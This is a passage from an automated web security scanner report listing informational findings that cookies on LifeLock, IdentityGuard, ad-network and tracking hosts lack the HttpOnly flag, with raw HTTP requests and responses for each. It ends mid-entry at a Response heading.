Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; promoCode=NEXT; TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:23:43 GMT
ETag: W/"3858-1303446290000"
Last-Modified: Fri, 22 Apr 2011 04:24:50 GMT
Cache-Control: max-age=900
Expires: Sun, 24 Apr 2011 03:38:43 GMT
Connection: Keep-Alive
Content-Type: text/javascript
Set-Cookie: TS376161=58e3370f24dce77bbca52bcb5eaf49235438784dc7b0156d4db397bf; Path=/
Vary: Accept-Encoding
Content-Length: 3858

function loadJquery(){$(".info,.help,.infoTip").click(function(){return false}).tipsy({gravity:"w"});$(".help.lefty,.info.lefty").click(function(){return false}).tipsy({gravity:"e"});if($(".accept inp
...[SNIP]...

14.66. https://secure.lifelock.com/styles/login.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /styles/login.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/login.css HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/portal/login
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; isWebstoreEnrollmentPage=true; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; TS376161=d566ab28e565142c668f1a3223da9d8931f2a75f23110e424db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:18:56 GMT
ETag: W/"1705-1303446290000"
Last-Modified: Fri, 22 Apr 2011 04:24:50 GMT
Cache-Control: max-age=900
Expires: Sun, 24 Apr 2011 03:33:56 GMT
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TS376161=f5b613a8c090fe06b99a29858ee6feec31f2a75f23110e424db396a0; Path=/
Vary: Accept-Encoding
Content-Length: 1705

body,form,ul,ol,li,table,td,p,h1,h2,h3,img{margin:0;padding:0;border:none;}body{color:#4b4640;font-size:12px;font-family:Verdana,Arial,Helvetica,sans-serif;text-align:center;background-color:#ececec;}
...[SNIP]...

14.67. https://secure.lifelock.com/styles/theme-lifelock.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /styles/theme-lifelock.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/theme-lifelock.css HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/enrollment?promocode=next&uid=945440258CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; promoCode=NEXT; TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:23:24 GMT
ETag: W/"1587-1303446290000"
Last-Modified: Fri, 22 Apr 2011 04:24:50 GMT
Cache-Control: max-age=900
Expires: Sun, 24 Apr 2011 03:38:24 GMT
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TS376161=3839eec1194f2196eff313388078a6965438784dc7b0156d4db397ac; Path=/
Vary: Accept-Encoding
Content-Length: 1587

#header .logo{left:23px;top:23px;width:202px;height:56px;background-image:url(https://cdn.lifelock.com/assets/secure/images/lifelock-logo.png);}h2.step-1,h2.step-2,h2.step-3,h2.step-4{background-image
...[SNIP]...

14.68. https://secure.lifelock.com/styles/webstore.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /styles/webstore.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/webstore.css HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/enrollment?promocode=next&uid=945440258CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; promoCode=NEXT; TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:23:24 GMT
ETag: W/"23213-1303446290000"
Last-Modified: Fri, 22 Apr 2011 04:24:50 GMT
Cache-Control: max-age=900
Expires: Sun, 24 Apr 2011 03:38:24 GMT
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TS376161=3839eec1194f2196eff313388078a6965438784dc7b0156d4db397ac; Path=/
Vary: Accept-Encoding
Content-Length: 23213

body,form,fieldset,legend,object,img,iframe,table,td,th,ul,li,ol,h1,h2,h3,h4,h5,h6,p,blockquote{margin:0;padding:0;border:0;vertical-align:middle;}table{border-collapse:collapse;border-spacing:0;}ul,o
...[SNIP]...

14.69. http://stats.kroogy.com/cnt-gif1x1.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.kroogy.com
Path:   /cnt-gif1x1.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cnt-gif1x1.php?e=1920.1200&d=16&r=&p=http%3A//kroogy.com/&t=Kroogy%20Search%20-%20Home HTTP/1.1
Host: stats.kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 12:25:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
P3P: policyref="/w3c/p3p.xml", CP="UNI"
Set-Cookie: cnscc=1303647928; expires=Tue, 24-Apr-2012 23:59:59 GMT; path=/
Location: ./cnt-gif1x1.php?second=1&e=1920.1200&d=16&r=&p=http%3A//kroogy.com/&t=Kroogy%20Search%20-%20Home
Pragma: no-cache
Cache-control: no-cache
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31

<html><body>Moved</body></html>

14.70. http://stats.kroogy.com/cnt-gif1x1.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.kroogy.com
Path:   /cnt-gif1x1.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cnt-gif1x1.php?second=1&e=1920.1200&d=16&r=&p=http%3A//kroogy.com/&t=Kroogy%20Search%20-%20Home HTTP/1.1
Host: stats.kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943; cnscc=1303647928

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:25:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
P3P: policyref="/w3c/p3p.xml", CP="UNI"
Set-Cookie: cnsuser_id=2425920106; expires=Tue, 24-Apr-2012 23:59:59 GMT; path=/
Pragma: no-cache
Cache-control: no-cache
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

14.71. http://www.apmebf.com/r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apmebf.com
Path:   /r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G?b=u4up%3DsupLm%2Bupqz5u5A%2B5tqr5%2B3q4063oq_03pq3uzsFG--ECDD-CG-EF--EC-DC-CGOPD%2663x%3Dt5514%25FM%25ER%25ER888.qo0z46yq3.q26urm9.o0y%25ERo0z46yq3%25ERxmzpuzs.qt5yx%25FR%25EHHq45m35%25FP%25EIo0y1mzAZmyq%25FPov_q4z1F3%3C%3Ct551%3A%2F%2F888.w2BArv.o0y%3AKC%2Foxuow-DLDDLID-DCJHDLKJ%3C%3CS%3C%3C HTTP/1.1
Host: www.apmebf.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=g14vo-36788-1303134591742-0g

Response

HTTP/1.1 302 Found
Server: Resin/3.1.8
P3P: policyref="http://www.apmebf.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"
Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Sun, 24 Apr 2011 03:10:07 GMT
Location: http://www.emjcd.com/5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH?r=xtje%3DhjeAb%2Bjefoujuz%2Buifgu%2Bsftpvsdf_psefsjoh45--3122-15-34--31-21-15DE2%26vsm%3Diuuqt%254B%253G%253Gxxx.fdpotvnfs.frvjgby.dpn%253Gdpotvnfs%253Gmboejoh.fiunm%254G%25366ftubsu%254E%2537dpnqbozObnf%254Edk_ftoq4s<dkp!x7ry-t2xepAz<iuuq%3A%2F%2Fxxx.lr0zgk.dpn%3A91%2Fdmjdl-2A22A72-21862A98<<H<<
Set-Cookie: LCLK=cjo!w6qx-s1wdo9y; domain=.apmebf.com; path=/; expires=Fri, 22-Apr-2016 03:10:07 GMT
Content-Type: text/html
Connection: close
Date: Sun, 24 Apr 2011 03:10:07 GMT
Content-Length: 983

<html>
<head><meta http-equiv="redirect" content="http://www.emjcd.com/5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH?r=xtje%3DhjeAb%2Bjefoujuz%2Buifgu
...[SNIP]...

14.72. http://www.emjcd.com/5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.emjcd.com
Path:   /5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH?r=xtje%3DhjeAb%2Bjefoujuz%2Buifgu%2Bsftpvsdf_psefsjoh45--3122-15-34--31-21-15DE2%26vsm%3Diuuqt%254B%253G%253Gxxx.fdpotvnfs.frvjgby.dpn%253Gdpotvnfs%253Gmboejoh.fiunm%254G%25366ftubsu%254E%2537dpnqbozObnf%254Edk_ftoq4s%3Cdkp!x7ry-t2xepAz%3Ciuuq%3A%2F%2Fxxx.lr0zgk.dpn%3A91%2Fdmjdl-2A22A72-21862A98%3C%3CH%3C%3C HTTP/1.1
Host: www.emjcd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: Resin/3.1.8
P3P: policyref="http://www.emjcd.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"
Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Sun, 24 Apr 2011 03:10:08 GMT
Location: https://www.econsumer.equifax.com/consumer/landing.ehtml?%5estart=&companyName=cj_esnp3r&AID=10751987&PID=1911961&SID=gid9a+identity+theft+resource_ordering34--2011-04-23--20-10-04CD1
Set-Cookie: LCLK=cjo!w6qx-s1wdo9y; domain=.emjcd.com; path=/; expires=Fri, 22-Apr-2016 03:10:08 GMT
Set-Cookie: S=g14vo-36788-1303134591742-0g; domain=.emjcd.com; path=/; expires=Fri, 22-Apr-2016 03:10:08 GMT
Set-Cookie: PBLP=1501737:1911961:1303614608209; path=/; expires=Fri, 22-Apr-2016 03:10:08 GMT
Content-Type: text/html
Connection: close
Date: Sun, 24 Apr 2011 03:10:08 GMT
Content-Length: 517

<html>
<head><meta http-equiv="redirect" content="https://www.econsumer.equifax.com/consumer/landing.ehtml?%5estart=&amp;companyName=cj_esnp3r&amp;AID=10751987&amp;PID=1911961&amp;SID=gid9a+identity+t
...[SNIP]...

14.73. http://www.googleadservices.com/pagead/aclk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/aclk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/aclk?sa=L&ai=BKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE&num=1&client=ca-pub-6888065668292638&val=ChAyMmZiYTMwMDE2MDEwMDhkEJSfre0EGghI3SWftmaJ_yABKAE&sig=AGiWqtzICqiMDTo80UkKP6AzOKgkaHuSwA&adurl=http://clk.atdmt.com/go/253732016/direct%3Bai.194941096%3Bct.1/01 HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Referer: http://ec.atdmt.com/ds/5RTLCLFLKLFL/v120_myIdentitymyLife_red/160x600_blankJobRed.swf?ver=1&clickTag1=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01&clickTag=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Set-Cookie: Conversion=CtACQktrYnA1QmEwVGQzd0ZvejJsQWVieXJDd0NkZnEtTk1CbjZDVTdCaWZ4TzNVSEFBUUFSZ0JJQUE0QVZDQXgtSEVCR0RKN29PSThLUHNFb0lCRjJOaExYQjFZaTAyT0RnNE1EWTFOalk0TWpreU5qTTRvQUhEOHYzc0E3SUJGM0IxWWk1eVpYUmhhV3hsY2kxaGJXRjZiMjR1Ym1WMHVnRUtNVFl3ZURZd01GOWhjOGdCQ2RvQlNXaDBkSEE2THk5d2RXSXVjbVYwWVdsc1pYSXRZVzFoZW05dUxtNWxkQzlpWVc1dVpYSmZNVEl3WHpZd01GOWhMbkJvY0Q5elpXRnlZMmc5SlRkQ0pHdGxlWGR2Y21RbE4wU1lBdVFad0FJRXlBS0YwczhLcUFNQjZBTzhBZWdEbEFMMUF3QUFBTVNBQnVpM3pxckJqcktHMFFFEhMIvbvOyZS1qAIViN7gCh0CTvIJGAEg2Ojpw8TTuK2fAUgB; expires=Tue, 24-May-2011 12:32:36 GMT; path=/pagead/conversion/1033861443/
Cache-Control: private
Location: http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 12:32:36 GMT
Server: AdClickServer
Content-Length: 0
X-XSS-Protection: 1; mode=block


14.74. http://www.identityguard.com/gscc.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.identityguard.com
Path:   /gscc.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gscc.aspx?mktp=Next&utm_medium=affiliates&hid=205557652&campid=14&c1=394717213CD1&c2=CD1&cenhp1=1 HTTP/1.1
Host: www.identityguard.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: URLParams=mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; cmTPSet=Y; CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; __utmb=242046173.1.10.1303614598; 90226925_clogin=l=1303614597&v=1&e=1303615498489

Response